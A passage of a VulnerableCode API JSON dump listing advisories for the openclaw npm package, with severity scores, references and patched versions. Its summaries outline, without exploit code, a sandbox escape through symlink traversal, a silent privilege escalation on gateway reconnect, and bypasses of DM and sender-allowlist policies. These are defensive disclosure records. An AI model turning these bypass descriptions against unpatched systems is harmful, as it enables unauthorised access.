                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3b9dab0ece4643a9643e6a45459f5c709d3ce320"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cwf8-44x6-32c2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41397",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41397"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:37:54Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-unrestricted-file-sync-and-symlink-traversal"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cwf8-44x6-32c2",
                    "reference_id": "GHSA-cwf8-44x6-32c2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cwf8-44x6-32c2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41397",
                "GHSA-cwf8-44x6-32c2"
            ],
            "risk_score": 4.3,
            "exploitability": "0.5",
            "weighted_severity": "8.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hd4w-s3dp-nubj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91601?format=api",
            "vulnerability_id": "VCID-hkqd-6khg-m3hj",
            "summary": "OpenClaw: Silent privilege escalation via gateway shared-auth reconnect\n## Summary\n\nGateway local shared-auth reconnect silently widens paired device scope from operator.read to operator.admin and reach node RCE\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nSilent local shared-auth reconnects could previously auto-approve `scope-upgrade` requests and widen a paired device from `operator.read` to `operator.admin`. Commit `81ebc7e0344fd19c85778e883bad45e2da972229` blocks silent reconnect scope upgrades so widened scopes require an explicit pairing approval instead of an implicit local reconnect path.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `81ebc7e0344fd19c85778e883bad45e2da972229`.\n\n## Fix Commit(s)\n\n- `81ebc7e0344fd19c85778e883bad45e2da972229`",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/81ebc7e0344fd19c85778e883bad45e2da972229"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "9.4",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-fqw4-mph7-2vr8"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-fqw4-mph7-2vr8",
                    "reference_id": "GHSA-fqw4-mph7-2vr8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "CRITICAL",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-fqw4-mph7-2vr8"
                }
            ],
            "fixed_packages": [],
            "aliases": [
                "GHSA-fqw4-mph7-2vr8"
            ],
            "risk_score": 4.5,
            "exploitability": "0.5",
            "weighted_severity": "9.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hkqd-6khg-m3hj"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89119?format=api",
            "vulnerability_id": "VCID-hz33-9efv-c7ef",
            "summary": "OpenClaw: Feishu card actions could misclassify DMs and skip dmPolicy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nFeishu card-action callbacks could synthesize a message event with DM conversations classified as group conversations. That skipped `dmPolicy` enforcement for card actions, so a sender in a Feishu DM could trigger card-action flows that should have been blocked by a restrictive DM policy.\n\nThe issue is limited to Feishu card-action handling. Severity is medium.\n\n## Fix\n\nOpenClaw now resolves Feishu card-action chat type before dispatch, including API lookup when stored context is unavailable, and avoids falling through to group handling for DMs.\n\nFix commit:\n\n- `90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-72q8-jcmc-97wx",
                    "reference_id": "GHSA-72q8-jcmc-97wx",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-72q8-jcmc-97wx"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "GHSA-72q8-jcmc-97wx"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-hz33-9efv-c7ef"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89568?format=api",
            "vulnerability_id": "VCID-j8fb-fhyc-33fu",
            "summary": "OpenClaw: MSTeams thread history bypasses sender allowlist via Graph API\n## Summary\nMSTeams thread history bypasses sender allowlist via Graph API\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: Real in shipped v2026.3.28 MS Teams because Graph-fetched thread history bypasses sender allowlists, with unreleased mainline filtering fix.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `5cca38084074fb5095aa11b6a59820d63e4937c9` — 2026-03-30T15:38:26+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41365",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10395",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10436",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10417",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41365"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5cca38084074fb5095aa11b6a59820d63e4937c9"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T13:54:54Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-chfm-xgc4-47rj"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41365",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41365"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-sender-allowlist-bypass-via-graph-api-thread-history",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
